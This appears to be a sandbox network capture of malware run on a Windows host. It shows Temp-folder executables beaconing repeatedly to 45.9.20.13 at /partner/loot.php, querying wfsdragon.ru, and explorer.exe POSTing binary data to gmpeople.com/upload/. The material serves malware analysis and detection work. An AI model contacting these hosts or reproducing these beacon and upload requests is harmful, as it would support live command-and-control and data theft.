                                      Session ID: 2, Source IP: 192.168.2.4, Source Port: 59965, Destination IP: 172.67.133.215, Destination Port: 80, PID: 7996, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      Timestamp: Aug 21, 2024 10:57:29.903273106 CEST, Bytes transferred: 206, Direction: OUT
                                      Data: GET /api/setStats.php HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: wfsdragon.ru
                                      Timestamp: Aug 21, 2024 10:57:30.610217094 CEST, Bytes transferred: 1236, Direction: IN
                                      Data: HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:30 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMPZcVCLz7oUqPNw7shSOIByM9YE04cLZllZ7sOIyjnJq1H77lEDrCi9cQyWRmoqLpZoMuybl87M7Dn2MGKrqEdVk99EemzmpSS6LpICv0PAFi50r7UA4Pwk6TGeeoo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8b696a7c7f237cab-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8b696a7c7f237cab',t:'MTcyNDIzMDY1MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement(
                                      Timestamp: Aug 21, 2024 10:57:30.610367060 CEST, Bytes transferred: 491, Direction: IN
                                      Data Ascii: 'iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)docum


                                      Session ID: 3, Source IP: 192.168.2.4, Source Port: 59967, Destination IP: 51.178.186.149, Destination Port: 80, PID: 7996, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      Timestamp: Aug 21, 2024 10:57:30.643382072 CEST, Bytes transferred: 215, Direction: OUT
                                      Data: GET /base/api/statistics.php HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: 51.178.186.149


                                      Session ID: 4, Source IP: 192.168.2.4, Source Port: 59968, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:57:31.423799038 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 5, Source IP: 192.168.2.4, Source Port: 59977, Destination IP: 188.40.141.211, Destination Port: 80, PID: 2580, Process: C:\Windows\explorer.exe
                                      Timestamp: Aug 21, 2024 10:57:49.617980957 CEST, Bytes transferred: 279, Direction: OUT
                                      Data: POST /upload/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gmpeople.com/upload/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 341
                                      Host: gmpeople.com
                                      Timestamp: Aug 21, 2024 10:57:49.618021965 CEST, Bytes transferred: 341, Direction: OUT
                                      Data: (341-byte binary request body; hex and ASCII dump not reproduced)
                                      Timestamp: Aug 21, 2024 10:57:50.304039955 CEST, Bytes transferred: 151, Direction: IN
                                      Data: HTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 7
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Data Raw: 03 00 00 00 70 e8 c6
                                      Data Ascii: p
                                      Timestamp: Aug 21, 2024 10:57:50.318002939 CEST, Bytes transferred: 279, Direction: OUT
                                      Data: POST /upload/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gmpeople.com/upload/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 187
                                      Host: gmpeople.com
                                      Timestamp: Aug 21, 2024 10:57:50.318109035 CEST, Bytes transferred: 187, Direction: OUT
                                      Data: (187-byte binary request body; hex and ASCII dump not reproduced)
                                      Timestamp: Aug 21, 2024 10:57:50.751966000 CEST, Bytes transferred: 144, Direction: IN
                                      Data: HTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 0
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Timestamp: Aug 21, 2024 10:57:50.877175093 CEST, Bytes transferred: 144, Direction: IN
                                      Data: HTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 0
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT


                                      Session ID: 6, Source IP: 192.168.2.4, Source Port: 59980, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:57:52.790793896 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 7, Source IP: 192.168.2.4, Source Port: 59995, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:14.184186935 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 8, Source IP: 192.168.2.4, Source Port: 60002, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:26.223206043 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 9, Source IP: 192.168.2.4, Source Port: 60006, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:34.238300085 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 10, Source IP: 192.168.2.4, Source Port: 60010, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:38.254776955 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 11, Source IP: 192.168.2.4, Source Port: 60013, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:42.281301022 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 12, Source IP: 192.168.2.4, Source Port: 60015, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:46.298897982 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 13, Source IP: 192.168.2.4, Source Port: 60018, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:50.315246105 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 14, Source IP: 192.168.2.4, Source Port: 60022, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:54.334098101 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 15, Source IP: 192.168.2.4, Source Port: 60024, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:58:58.348725080 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 16, Source IP: 192.168.2.4, Source Port: 60027, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:02.360569954 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 17, Source IP: 192.168.2.4, Source Port: 60031, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:06.421536922 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 18, Source IP: 192.168.2.4, Source Port: 60033, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:10.583111048 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 19, Source IP: 192.168.2.4, Source Port: 60036, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:14.596736908 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 20, Source IP: 192.168.2.4, Source Port: 60040, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:18.615184069 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 21, Source IP: 192.168.2.4, Source Port: 60043, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:22.632713079 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 22, Source IP: 192.168.2.4, Source Port: 60045, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:26.641937017 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 23, Source IP: 192.168.2.4, Source Port: 60048, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:31.010417938 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session ID: 24, Source IP: 192.168.2.4, Source Port: 60052, Destination IP: 45.9.20.13, Destination Port: 80, PID: 8076, Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Timestamp: Aug 21, 2024 10:59:35.036703110 CEST, Bytes transferred: 419, Direction: OUT
                                      Data: GET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 60055 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:39.182205915 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 60057 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:43.212670088 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 60061 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:47.230123997 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 60063 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:51.252470970 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 60066 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:55.336297989 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 60070 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:59:59.347681999 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 60073 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:03.662852049 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 60076 | 45.9.20.13 | 80 | 8076 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 11:00:07.657536030 CEST | 419 | OUT | GET /partner/loot.php?pub=mixone HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: PJ-BQ-uz-Hc-7-y
    Host: 45.9.20.13
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
